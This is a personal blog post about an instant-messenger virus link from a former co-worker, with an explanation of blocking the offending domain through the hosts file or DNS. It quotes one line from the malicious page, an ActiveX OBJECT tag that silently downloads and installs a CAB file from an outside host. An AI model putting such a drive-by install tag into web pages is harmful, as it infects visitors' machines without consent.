Today, K, a former co-worker of mine messaged me out of the blue:
check this out... [some URL that I've edited out but had "osama capture" in the filename]
The last time I had heard from K was probably about two years ago, after I was laid of from Cox, so in my curiosity, I went ahead and clicked on the link and got a nondescript page.
And nothing happened.
You see, I'm running Linux at work, and those wonderfully magic things that happen when most people go to random web addresses don't always happen to me.
Which in this case would be a good thing.
See, later on, K would send me the following message:
if you get a link from me, don't click on it. it's some kind of virus
Given my natural programmer's curiosity, I went to the site with my text-based browser and found the following line:
<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0 CLASSID="<some-junk>" CODEBASE="http:// [a buddylinks.net web address] /ShellInstaller.cab#Version=1,0,0,001">
Knowing what I know about Windows and its ilk, I figured that the fine folks at buddylinks.net have figured out how to automatically install and run an application from a webpage--an application which runs through your buddy list and sends every person on it a message.
It occured to me that there would be a very nice and easy way of getting rid of said Internet jackasses. If you've ever installed Kazaa Lite, you might know that one of the things installed along with the program is a new Windows hosts file.
Most of the time, the internet has its own way of resolving internet addresses (it's called DNS). If your computer doesn't know what www.joewebsite.com is, it asks another computer if it knows, which can ask another, and so on sort of like that shampoo commercial, but in a more organized and hierarchical fashion. The hosts file, however, is like a personal address book of internet IP addresses--ones which might not agree with what that big hierarchical system might provide.
Your average user will never care to use or even see what's going on in the hosts file. The reason Kazaa Lite installs a new one is the kind folk who make the application have harvested a bunch of the addresses of the more annoying netizens--advertisers, popup purveyors, those kind of guys--and have pointed their addresses at your own.
How does this help? Well, unlike the U.S. Postal Service, the web works on a request basis. You tell your computer "give me google," and it finds google and downloads it. Advertisers sneak their messages in with the messages that you download, essentially piggybacking on things that you request--"hey, computer, while you're getting website A, go to website B and download other crap."
So the hosts file that Kazaa Lite installs has set most of the common "website Bs" around the world to your own address (127.0.0.1), which, if you're the average user, isn't running web server software and doesn't have advertisements. Your web browser tries to find the ad image or the pop up code, and when it fails, it just stops trying. It's like a little workaround for the popup ad problem, at least for that one ad on your computer.
How does this relate to an Instant Messenger virus?
The host file can pretty much eliminate a given offender from the internet for a single computer
. Imagine, if you will, taking the domain name of a known virus purveyor (say, www.buddylinks.net), and entering it into the big hierarchical system as 127.0.0.1 or some other innocuous address. That replacement address would effectively blacklist the offending site for all the computers that trusted the DNS service of that portion of the hierarchy.
Granted, I'm neither a system administrator nor an expert in DNS, but given the proliferation of Internet assholes, I'm liking this idea more and more...